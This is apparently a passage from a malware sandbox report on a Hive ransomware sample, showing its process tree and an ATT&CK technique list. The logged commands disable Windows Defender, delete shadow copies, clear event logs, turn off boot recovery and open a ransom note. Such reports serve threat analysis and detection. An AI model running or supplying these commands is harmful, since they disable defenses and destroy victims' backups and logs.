  PID:5272
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:556
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:3076
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:6076
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:2148
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:5464
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:880
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:1056
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:5388
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies Security services
  PID:3008
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:4192
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:400
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:3576
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1076
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2816
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2716
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:2516
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:3964
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3944
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:4440
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:1792
- C:\Windows\SYSTEM32\notepad.exe
  notepad.exe C:\phLK_HOW_TO_DECRYPT.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:384
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\Desktop\Trojan-Ransom.Win32.Hive.co-36fe56519a798213116d5f7328fa81ef7c550f4f14c36e7f30c330bdd6d7d42e.exe"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:1196
- - C:\Windows\system32\PING.EXE
    ping.exe -n 5 127.0.0.1
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:4548

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1920

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3296

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\phLK_HOW_TO_DECRYPT.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:516

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
PID:3892
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  PID:404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x124,0x128,0x12c,0x70,0x130,0x7ffe3725dcf8,0x7ffe3725dd04,0x7ffe3725dd10
  2⤵
  PID:4360
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1976,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1968 /prefetch:2
  2⤵
  PID:3596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2308,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2320 /prefetch:3
  2⤵
  - Downloads MZ/PE file
  PID:3036
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2440,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2456 /prefetch:8
  2⤵
  PID:2152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3248 /prefetch:1
  2⤵
  PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3540,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3568 /prefetch:1
  2⤵
  PID:1912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4568,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4564 /prefetch:2
  2⤵
  PID:1476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4696,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3908 /prefetch:1
  2⤵
  PID:2500
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=4708,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4928 /prefetch:1
  2⤵
  PID:5668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5440,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5464 /prefetch:8
  2⤵
  PID:1400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3248,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:8
  2⤵
  PID:4436
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5856,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5852 /prefetch:8
  2⤵
  PID:2928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3660,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5848 /prefetch:8
  2⤵
  PID:2440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5980,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6128 /prefetch:8
  2⤵
  PID:2924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5964,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5864 /prefetch:8
  2⤵
  PID:4352
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,15304755704831834453,5460217953668941831,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=6052 /prefetch:8
  2⤵
  PID:3500
- C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.9.exe
  "C:\Users\Admin\Downloads\tor-browser-windows-x86_64-portable-14.0.9.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Loads dropped DLL
  - Modifies registry class
  PID:3248
- - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
    "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:3792
  - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
      "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks whether UAC is enabled
      Checks processor information in registry
      Suspicious use of SetWindowsHookEx
      PID:4860
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2524 -parentBuildID 20250331180000 -prefsHandle 2500 -prefMapHandle 2488 -prefsLen 21011 -prefMapSize 252329 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {ec74335d-3698-4828-b201-1f7b79fc1eae} 4860 gpu
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3100
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Tor\tor.exe" -f "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc" DataDirectory "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor" ClientOnionAuthDir "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\onion-auth" --defaults-torrc "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\torrc-defaults" GeoIPFile "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip" GeoIPv6File "C:\Users\Admin\Desktop\Tor Browser\Browser\TorBrowser\Data\Tor\geoip6" +__ControlPort 127.0.0.1:9151 HashedControlPassword 16:3af5164c5deffed9606e677461027ccd5991c33592a397b39200ab74df +__SocksPort "127.0.0.1:9150 ExtendedErrors IPv6Traffic PreferIPv6 KeepAliveIsolateSOCKSAuth" __OwningControllerProcess 4860 DisableNetwork 1
        5⤵
        Executes dropped EXE
        
        PID:2876
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=2152 -childID 1 -isForBrowser -prefsHandle 2284 -prefMapHandle 2280 -prefsLen 21821 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {273e8e57-ff5a-411a-bd89-1e3ec8af4e63} 4860 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3604
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3244 -childID 2 -isForBrowser -prefsHandle 3236 -prefMapHandle 3232 -prefsLen 22591 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {09e6225f-af04-4b48-8c3b-050a955a259d} 4860 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4516
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3432 -childID 3 -isForBrowser -prefsHandle 3440 -prefMapHandle 3444 -prefsLen 22667 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {e112c1e7-88ff-4ba5-bc41-8e1bf35dd740} 4860 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5128
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=3892 -parentBuildID 20250331180000 -prefsHandle 3976 -prefMapHandle 3980 -prefsLen 23093 -prefMapSize 252329 -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {7a25e43c-725a-4f51-8eff-03620b898501} 4860 rdd
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2304
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1760 -childID 4 -isForBrowser -prefsHandle 3684 -prefMapHandle 3488 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {cadd6a90-ae0d-4283-bac3-92f3b26c67a7} 4860 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2440
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1892 -childID 5 -isForBrowser -prefsHandle 4104 -prefMapHandle 4100 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2f79c45e-850e-4427-9248-62f268b04106} 4860 tab
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1964
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=1880 -childID 6 -isForBrowser -prefsHandle 1916 -prefMapHandle 1776 -prefsLen 22517 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {2cb7cbe8-1ae8-41be-a171-c5acdf35d4a0} 4860 tab
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4576
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4532 -parentBuildID 20250331180000 -sandboxingKind 0 -prefsHandle 3716 -prefMapHandle 4512 -prefsLen 25640 -prefMapSize 252329 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {59517a1f-b918-401a-a6e0-cf1f68e772b5} 4860 utility
        5⤵
        Executes dropped EXE
        Checks processor information in registry
        
        PID:3488
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=4832 -childID 7 -isForBrowser -prefsHandle 4660 -prefMapHandle 4860 -prefsLen 24401 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {54c48e41-6a01-449f-902a-c658b82d46fa} 4860 tab
        5⤵
        Executes dropped EXE
        
        PID:5204
    - - C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe
        
        "C:\Users\Admin\Desktop\Tor Browser\Browser\firefox.exe" -contentproc --channel=5504 -childID 8 -isForBrowser -prefsHandle 3180 -prefMapHandle 1812 -prefsLen 24685 -prefMapSize 252329 -jsInitHandle 1392 -jsInitLen 234912 -parentBuildID 20250331180000 -win32kLockedDown -appDir "C:\Users\Admin\Desktop\Tor Browser\Browser\browser" - {27673ca7-db2e-45a4-b28a-871a4b737dd0} 4860 tab
        5⤵
        Executes dropped EXE
        
        PID:4384

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1200

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery